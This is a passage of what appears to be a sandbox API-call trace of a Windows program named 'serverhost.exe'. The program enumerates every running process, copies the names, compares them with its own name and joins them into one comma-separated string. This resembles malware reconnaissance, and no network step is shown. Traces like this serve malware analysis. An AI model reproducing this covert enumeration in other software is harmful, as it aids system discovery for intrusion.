hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="output.exe")) returned 1 [0081.605] GetCurrentProcessId () returned 0xc18 [0081.605] lstrcpyW (in: lpString1=0x4a3dc4, lpString2="output.exe" | out: lpString1="output.exe") returned="output.exe" [0081.605] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x528, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="bookings.exe")) returned 1 [0081.606] GetCurrentProcessId () returned 0xc18 [0081.606] lstrcpyW (in: lpString1=0x4a3fec, lpString2="bookings.exe" | out: lpString1="bookings.exe") returned="bookings.exe" [0081.606] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lyrics-morning-effectiveness.exe")) returned 1 [0081.606] GetCurrentProcessId () returned 0xc18 [0081.607] lstrcpyW (in: lpString1=0x4a4214, lpString2="lyrics-morning-effectiveness.exe" | out: lpString1="lyrics-morning-effectiveness.exe") returned="lyrics-morning-effectiveness.exe" [0081.607] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="involved-int-antenna-lol.exe")) returned 1 [0081.607] GetCurrentProcessId () returned 0xc18 [0081.607] lstrcpyW (in: lpString1=0x4a443c, lpString2="involved-int-antenna-lol.exe" | out: lpString1="involved-int-antenna-lol.exe") returned="involved-int-antenna-lol.exe" [0081.607] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="enterprise monsters comments.exe")) returned 1 [0081.608] GetCurrentProcessId () returned 0xc18 [0081.608] lstrcpyW (in: lpString1=0x4a4664, lpString2="enterprise monsters comments.exe" | out: lpString1="enterprise monsters comments.exe") returned="enterprise monsters comments.exe" [0081.608] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="food_logos_lot.exe")) returned 1 [0081.609] GetCurrentProcessId () returned 0xc18 [0081.609] lstrcpyW (in: lpString1=0x4a488c, lpString2="food_logos_lot.exe" | out: lpString1="food_logos_lot.exe") returned="food_logos_lot.exe" [0081.609] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="designed.exe")) returned 1 [0081.610] GetCurrentProcessId () returned 0xc18 [0081.610] lstrcpyW (in: lpString1=0x4a4ab4, lpString2="designed.exe" | out: lpString1="designed.exe") returned="designed.exe" [0081.610] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="chargetrackbacksobserve.exe")) returned 1 [0081.610] GetCurrentProcessId () returned 0xc18 [0081.610] lstrcpyW (in: lpString1=0x4a4cdc, lpString2="chargetrackbacksobserve.exe" | out: lpString1="chargetrackbacksobserve.exe") returned="chargetrackbacksobserve.exe" [0081.610] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="info-began-nobody-tops.exe")) returned 1 [0081.611] GetCurrentProcessId () returned 0xc18 [0081.611] lstrcpyW (in: lpString1=0x4a4f04, lpString2="info-began-nobody-tops.exe" | out: lpString1="info-began-nobody-tops.exe") returned="info-began-nobody-tops.exe" [0081.611] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="myers biggest qatar.exe")) returned 1 [0081.612] GetCurrentProcessId () returned 0xc18 [0081.612] lstrcpyW (in: lpString1=0x4a512c, lpString2="myers biggest qatar.exe" | out: lpString1="myers biggest qatar.exe") returned="myers biggest qatar.exe" [0081.612] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="invalid.exe")) returned 1 [0081.612] GetCurrentProcessId () returned 0xc18 [0081.613] lstrcpyW (in: lpString1=0x4a5354, lpString2="invalid.exe" | out: lpString1="invalid.exe") returned="invalid.exe" [0081.613] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="panel-maria-suggestion.exe")) returned 1 [0081.613] GetCurrentProcessId () returned 0xc18 [0081.613] lstrcpyW (in: lpString1=0x4a557c, lpString2="panel-maria-suggestion.exe" | out: lpString1="panel-maria-suggestion.exe") returned="panel-maria-suggestion.exe" [0081.613] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="remained universe sole.exe")) returned 1 [0081.614] GetCurrentProcessId () returned 0xc18 [0081.614] lstrcpyW (in: lpString1=0x4a57a4, lpString2="remained universe sole.exe" | out: lpString1="remained universe sole.exe") returned="remained universe sole.exe" [0081.614] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="evanescence oscar em.exe")) returned 1 [0081.615] GetCurrentProcessId () returned 0xc18 [0081.615] lstrcpyW (in: lpString1=0x4a59cc, lpString2="evanescence oscar em.exe" | out: lpString1="evanescence oscar em.exe") returned="evanescence oscar em.exe" [0081.615] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="fifth roller.exe")) returned 1 [0081.615] GetCurrentProcessId () returned 0xc18 [0081.615] lstrcpyW (in: lpString1=0x4a5bf4, lpString2="fifth roller.exe" | out: lpString1="fifth roller.exe") returned="fifth roller.exe" [0081.615] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="irish.exe")) returned 1 [0081.616] GetCurrentProcessId () returned 0xc18 [0081.616] lstrcpyW (in: lpString1=0x4a5e1c, lpString2="irish.exe" | out: lpString1="irish.exe") returned="irish.exe" [0081.616] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="advocate-keep.exe")) returned 1 [0081.617] GetCurrentProcessId () returned 0xc18 [0081.617] lstrcpyW (in: lpString1=0x4a6044, lpString2="advocate-keep.exe" | out: lpString1="advocate-keep.exe") returned="advocate-keep.exe" [0081.617] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="distributors.exe")) returned 1 [0081.617] GetCurrentProcessId () returned 0xc18 [0081.617] lstrcpyW (in: lpString1=0x4a626c, lpString2="distributors.exe" | out: lpString1="distributors.exe") returned="distributors.exe" [0081.617] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighter.exe")) returned 1 [0081.618] GetCurrentProcessId () returned 0xc18 [0081.618] lstrcpyW (in: lpString1=0x4a6494, lpString2="lighter.exe" | out: lpString1="lighter.exe") returned="lighter.exe" [0081.618] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lease-entitled-pcs.exe")) returned 1 [0081.619] GetCurrentProcessId () returned 0xc18 [0081.619] lstrcpyW (in: lpString1=0x4a66bc, lpString2="lease-entitled-pcs.exe" | out: lpString1="lease-entitled-pcs.exe") returned="lease-entitled-pcs.exe" [0081.619] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="nerve-bracelet.exe")) returned 1 [0081.619] GetCurrentProcessId () returned 0xc18 [0081.619] lstrcpyW (in: lpString1=0x4a68e4, lpString2="nerve-bracelet.exe" | out: lpString1="nerve-bracelet.exe") returned="nerve-bracelet.exe" [0081.619] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0081.620] GetCurrentProcessId () returned 0xc18 [0081.620] lstrcpyW (in: lpString1=0x4a6b0c, lpString2="WINWORD.EXE" | out: lpString1="WINWORD.EXE") returned="WINWORD.EXE" [0081.620] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0081.621] GetCurrentProcessId () returned 0xc18 [0081.621] lstrcpyW (in: lpString1=0x4a6d34, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0081.621] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc04, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 1 [0081.621] GetCurrentProcessId () returned 0xc18 [0081.621] lstrcpyW (in: lpString1=0x4a6f5c, lpString2="serverhost.exe" | out: lpString1="serverhost.exe") returned="serverhost.exe" [0081.622] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc04, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 0 [0081.622] CloseHandle (hObject=0x14c) returned 1 [0081.622] lstrlenW (lpString="serverhost.exe") returned 14 [0081.622] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0081.622] lstrlenW (lpString="WINWORD.EXE") returned 11 [0081.622] lstrlenW (lpString="nerve-bracelet.exe") returned 18 [0081.622] lstrlenW (lpString="lease-entitled-pcs.exe") returned 22 [0081.622] lstrlenW (lpString="lighter.exe") returned 11 [0081.622] lstrlenW (lpString="distributors.exe") returned 16 [0081.622] lstrlenW (lpString="advocate-keep.exe") returned 17 [0081.622] lstrlenW (lpString="irish.exe") returned 9 [0081.622] lstrlenW (lpString="fifth roller.exe") returned 16 [0081.622] lstrlenW (lpString="evanescence oscar em.exe") returned 24 [0081.622] lstrlenW (lpString="remained universe sole.exe") returned 26 [0081.622] lstrlenW (lpString="panel-maria-suggestion.exe") returned 26 [0081.622] lstrlenW (lpString="invalid.exe") returned 11 [0081.622] lstrlenW (lpString="myers biggest qatar.exe") returned 23 [0081.622] lstrlenW (lpString="info-began-nobody-tops.exe") returned 26 [0081.622] lstrlenW (lpString="chargetrackbacksobserve.exe") returned 27 [0081.623] lstrlenW (lpString="designed.exe") returned 12 [0081.623] lstrlenW (lpString="food_logos_lot.exe") returned 18 [0081.623] lstrlenW (lpString="enterprise monsters comments.exe") returned 32 [0081.623] lstrlenW (lpString="involved-int-antenna-lol.exe") returned 28 [0081.623] lstrlenW (lpString="lyrics-morning-effectiveness.exe") returned 32 [0081.623] lstrlenW (lpString="bookings.exe") returned 12 [0081.623] lstrlenW (lpString="output.exe") returned 10 [0081.623] lstrlenW (lpString="argentina conducting merchandise.exe") returned 36 [0081.623] lstrlenW (lpString="blowiranlaboratorydisaster.exe") returned 30 [0081.623] lstrlenW (lpString="taskeng.exe") returned 11 [0081.623] lstrlenW (lpString="explorer.exe") returned 12 [0081.623] lstrlenW (lpString="dwm.exe") returned 7 [0081.623] lstrlenW (lpString="taskhost.exe") returned 12 [0081.623] lstrlenW (lpString="spoolsv.exe") returned 11 [0081.623] lstrlenW (lpString="audiodg.exe") returned 11 [0081.623] lstrlenW (lpString="svchost.exe") returned 11 [0081.623] lstrlenW (lpString="lsm.exe") returned 7 [0081.623] lstrlenW (lpString="lsass.exe") returned 9 [0081.623] lstrlenW (lpString="services.exe") returned 12 [0081.623] lstrlenW (lpString="winlogon.exe") returned 12 [0081.623] lstrlenW (lpString="wininit.exe") returned 11 [0081.623] lstrlenW (lpString="csrss.exe") returned 9 [0081.623] lstrlenW (lpString="smss.exe") returned 8 [0081.623] lstrlenW (lpString="System") returned 6 [0081.623] lstrlenW (lpString="[System Process]") returned 16 [0081.623] lstrcmpiW (lpString1="serverhost.exe", lpString2="serverhost.exe") returned 0 [0081.623] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="serverhost.exe") returned -1 [0081.623] lstrcpyW (in: lpString1=0x4a7958, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0081.623] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0081.623] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="serverhost.exe") returned 1 [0081.623] lstrcpyW (in: lpString1=0x4a7970, lpString2="WINWORD.EXE" | out: lpString1="WINWORD.EXE") returned="WINWORD.EXE" [0081.623] lstrlenW (lpString="WINWORD.EXE") returned 11 [0081.623] lstrcmpiW (lpString1="nerve-bracelet.exe", lpString2="serverhost.exe") returned -1 [0081.623] lstrcpyW (in: lpString1=0x4a7988, lpString2="nerve-bracelet.exe" | out: lpString1="nerve-bracelet.exe") returned="nerve-bracelet.exe" [0081.623] lstrlenW (lpString="nerve-bracelet.exe") returned 18 [0081.623] lstrcmpiW (lpString1="lease-entitled-pcs.exe", lpString2="serverhost.exe") returned -1 [0081.623] lstrcpyW (in: lpString1=0x4a79ae, lpString2="lease-entitled-pcs.exe" | out: lpString1="lease-entitled-pcs.exe") returned="lease-entitled-pcs.exe" [0081.623] lstrlenW (lpString="lease-entitled-pcs.exe") returned 22 [0081.623] lstrcmpiW (lpString1="lighter.exe", lpString2="serverhost.exe") returned -1 [0081.623] lstrcpyW (in: lpString1=0x4a79dc, lpString2="lighter.exe" | out: lpString1="lighter.exe") returned="lighter.exe" [0081.623] lstrlenW (lpString="lighter.exe") returned 11 [0081.623] lstrcmpiW (lpString1="distributors.exe", lpString2="serverhost.exe") returned -1 [0081.623] lstrcpyW (in: lpString1=0x4a79f4, lpString2="distributors.exe" | out: lpString1="distributors.exe") returned="distributors.exe" [0081.624] lstrlenW (lpString="distributors.exe") returned 16 [0081.624] lstrcmpiW (lpString1="advocate-keep.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7a16, lpString2="advocate-keep.exe" | out: lpString1="advocate-keep.exe") returned="advocate-keep.exe" [0081.624] lstrlenW (lpString="advocate-keep.exe") returned 17 [0081.624] lstrcmpiW (lpString1="irish.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7a3a, lpString2="irish.exe" | out: lpString1="irish.exe") returned="irish.exe" [0081.624] lstrlenW (lpString="irish.exe") returned 9 [0081.624] lstrcmpiW (lpString1="fifth roller.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7a4e, lpString2="fifth roller.exe" | out: lpString1="fifth roller.exe") returned="fifth roller.exe" [0081.624] lstrlenW (lpString="fifth roller.exe") returned 16 [0081.624] lstrcmpiW (lpString1="evanescence oscar em.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7a70, lpString2="evanescence oscar em.exe" | out: lpString1="evanescence oscar em.exe") returned="evanescence oscar em.exe" [0081.624] lstrlenW (lpString="evanescence oscar em.exe") returned 24 [0081.624] lstrcmpiW (lpString1="remained universe sole.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7aa2, lpString2="remained universe sole.exe" | out: lpString1="remained universe sole.exe") returned="remained universe sole.exe" [0081.624] lstrlenW (lpString="remained universe sole.exe") returned 26 [0081.624] lstrcmpiW (lpString1="panel-maria-suggestion.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7ad8, lpString2="panel-maria-suggestion.exe" | out: lpString1="panel-maria-suggestion.exe") returned="panel-maria-suggestion.exe" [0081.624] lstrlenW (lpString="panel-maria-suggestion.exe") returned 26 [0081.624] lstrcmpiW (lpString1="invalid.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7b0e, lpString2="invalid.exe" | out: lpString1="invalid.exe") returned="invalid.exe" [0081.624] lstrlenW (lpString="invalid.exe") returned 11 [0081.624] lstrcmpiW (lpString1="myers biggest qatar.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7b26, lpString2="myers biggest qatar.exe" | out: lpString1="myers biggest qatar.exe") returned="myers biggest qatar.exe" [0081.624] lstrlenW (lpString="myers biggest qatar.exe") returned 23 [0081.624] lstrcmpiW (lpString1="info-began-nobody-tops.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7b56, lpString2="info-began-nobody-tops.exe" | out: lpString1="info-began-nobody-tops.exe") returned="info-began-nobody-tops.exe" [0081.624] lstrlenW (lpString="info-began-nobody-tops.exe") returned 26 [0081.624] lstrcmpiW (lpString1="chargetrackbacksobserve.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7b8c, lpString2="chargetrackbacksobserve.exe" | out: lpString1="chargetrackbacksobserve.exe") returned="chargetrackbacksobserve.exe" [0081.624] lstrlenW (lpString="chargetrackbacksobserve.exe") returned 27 [0081.624] lstrcmpiW (lpString1="designed.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7bc4, lpString2="designed.exe" | out: lpString1="designed.exe") returned="designed.exe" [0081.624] lstrlenW (lpString="designed.exe") returned 12 [0081.624] lstrcmpiW (lpString1="food_logos_lot.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7bde, lpString2="food_logos_lot.exe" | out: lpString1="food_logos_lot.exe") returned="food_logos_lot.exe" [0081.624] lstrlenW (lpString="food_logos_lot.exe") returned 18 [0081.624] lstrcmpiW (lpString1="enterprise monsters comments.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7c04, lpString2="enterprise monsters comments.exe" | out: lpString1="enterprise monsters comments.exe") returned="enterprise monsters comments.exe" [0081.624] lstrlenW (lpString="enterprise monsters comments.exe") returned 32 [0081.624] lstrcmpiW (lpString1="involved-int-antenna-lol.exe", lpString2="serverhost.exe") returned -1 [0081.624] lstrcpyW (in: lpString1=0x4a7c46, lpString2="involved-int-antenna-lol.exe" | out: lpString1="involved-int-antenna-lol.exe") returned="involved-int-antenna-lol.exe" [0081.624] lstrlenW (lpString="involved-int-antenna-lol.exe") returned 28 [0081.624] lstrcmpiW (lpString1="lyrics-morning-effectiveness.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7c80, lpString2="lyrics-morning-effectiveness.exe" | out: lpString1="lyrics-morning-effectiveness.exe") returned="lyrics-morning-effectiveness.exe" [0081.625] lstrlenW (lpString="lyrics-morning-effectiveness.exe") returned 32 [0081.625] lstrcmpiW (lpString1="bookings.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7cc2, lpString2="bookings.exe" | out: lpString1="bookings.exe") returned="bookings.exe" [0081.625] lstrlenW (lpString="bookings.exe") returned 12 [0081.625] lstrcmpiW (lpString1="output.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7cdc, lpString2="output.exe" | out: lpString1="output.exe") returned="output.exe" [0081.625] lstrlenW (lpString="output.exe") returned 10 [0081.625] lstrcmpiW (lpString1="argentina conducting merchandise.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7cf2, lpString2="argentina conducting merchandise.exe" | out: lpString1="argentina conducting merchandise.exe") returned="argentina conducting merchandise.exe" [0081.625] lstrlenW (lpString="argentina conducting merchandise.exe") returned 36 [0081.625] lstrcmpiW (lpString1="blowiranlaboratorydisaster.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7d3c, lpString2="blowiranlaboratorydisaster.exe" | out: lpString1="blowiranlaboratorydisaster.exe") returned="blowiranlaboratorydisaster.exe" [0081.625] lstrlenW (lpString="blowiranlaboratorydisaster.exe") returned 30 [0081.625] lstrcmpiW (lpString1="taskeng.exe", lpString2="serverhost.exe") returned 1 [0081.625] lstrcpyW (in: lpString1=0x4a7d7a, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0081.625] lstrlenW (lpString="taskeng.exe") returned 11 [0081.625] lstrcmpiW (lpString1="explorer.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7d92, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0081.625] lstrlenW (lpString="explorer.exe") returned 12 [0081.625] lstrcmpiW (lpString1="dwm.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7dac, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0081.625] lstrlenW (lpString="dwm.exe") returned 7 [0081.625] lstrcmpiW (lpString1="taskhost.exe", lpString2="serverhost.exe") returned 1 [0081.625] lstrcpyW (in: lpString1=0x4a7dbc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0081.625] lstrlenW (lpString="taskhost.exe") returned 12 [0081.625] lstrcmpiW (lpString1="spoolsv.exe", lpString2="serverhost.exe") returned 1 [0081.625] lstrcpyW (in: lpString1=0x4a7dd6, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0081.625] lstrlenW (lpString="spoolsv.exe") returned 11 [0081.625] lstrcmpiW (lpString1="audiodg.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7dee, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0081.625] lstrlenW (lpString="audiodg.exe") returned 11 [0081.625] lstrcmpiW (lpString1="svchost.exe", lpString2="serverhost.exe") returned 1 [0081.625] lstrcpyW (in: lpString1=0x4a7e06, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0081.625] lstrlenW (lpString="svchost.exe") returned 11 [0081.625] lstrcmpiW (lpString1="lsm.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7e1e, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0081.625] lstrlenW (lpString="lsm.exe") returned 7 [0081.625] lstrcmpiW (lpString1="lsass.exe", lpString2="serverhost.exe") returned -1 [0081.625] lstrcpyW (in: lpString1=0x4a7e2e, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0081.625] lstrlenW (lpString="lsass.exe") returned 9 [0081.625] lstrcmpiW (lpString1="services.exe", lpString2="serverhost.exe") returned 1 [0081.625] lstrcpyW (in: lpString1=0x4a7e42, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0081.626] lstrlenW (lpString="services.exe") returned 12 [0081.626] lstrcmpiW (lpString1="winlogon.exe", lpString2="serverhost.exe") returned 1 [0081.626] lstrcpyW (in: lpString1=0x4a7e5c, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0081.626] lstrlenW (lpString="winlogon.exe") returned 12 [0081.626] lstrcmpiW (lpString1="wininit.exe", lpString2="serverhost.exe") returned 1 [0081.626] lstrcpyW (in: lpString1=0x4a7e76, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0081.626] lstrlenW (lpString="wininit.exe") returned 11 [0081.626] lstrcmpiW (lpString1="csrss.exe", lpString2="serverhost.exe") returned -1 [0081.626] lstrcpyW (in: lpString1=0x4a7e8e, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0081.626] lstrlenW (lpString="csrss.exe") returned 9 [0081.626] lstrcmpiW (lpString1="smss.exe", lpString2="serverhost.exe") returned 1 [0081.626] lstrcpyW (in: lpString1=0x4a7ea2, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0081.626] lstrlenW (lpString="smss.exe") returned 8 [0081.626] lstrcmpiW (lpString1="System", lpString2="serverhost.exe") returned 1 [0081.626] lstrcpyW (in: lpString1=0x4a7eb4, lpString2="System" | out: lpString1="System") returned="System" [0081.626] lstrlenW (lpString="System") returned 6 [0081.626] lstrcmpiW (lpString1="[System Process]", lpString2="serverhost.exe") returned -1 [0081.626] lstrcpyW (in: lpString1=0x4a7ec2, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0081.626] lstrlenW (lpString="[System Process]") returned 16 [0081.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPSVC.EXE,WINWORD.EXE,nerve-bracelet.exe,lease-entitled-pcs.exe,lighter.exe,distributors.exe,advocate-keep.exe,irish.exe,fifth roller.exe,evanescence oscar em.exe,remained universe sole.exe,panel-maria-suggestion.exe,invalid.exe,myers biggest qatar.exe,info-began-nobody-tops.exe,chargetrackbacksobserve.exe,designed.exe,food_logos_lot.exe,enterprise monsters comments.exe,involved-int-antenna-lol.exe,lyrics-morning-effectiveness.exe,bookings.exe,output.exe,argentina conducting 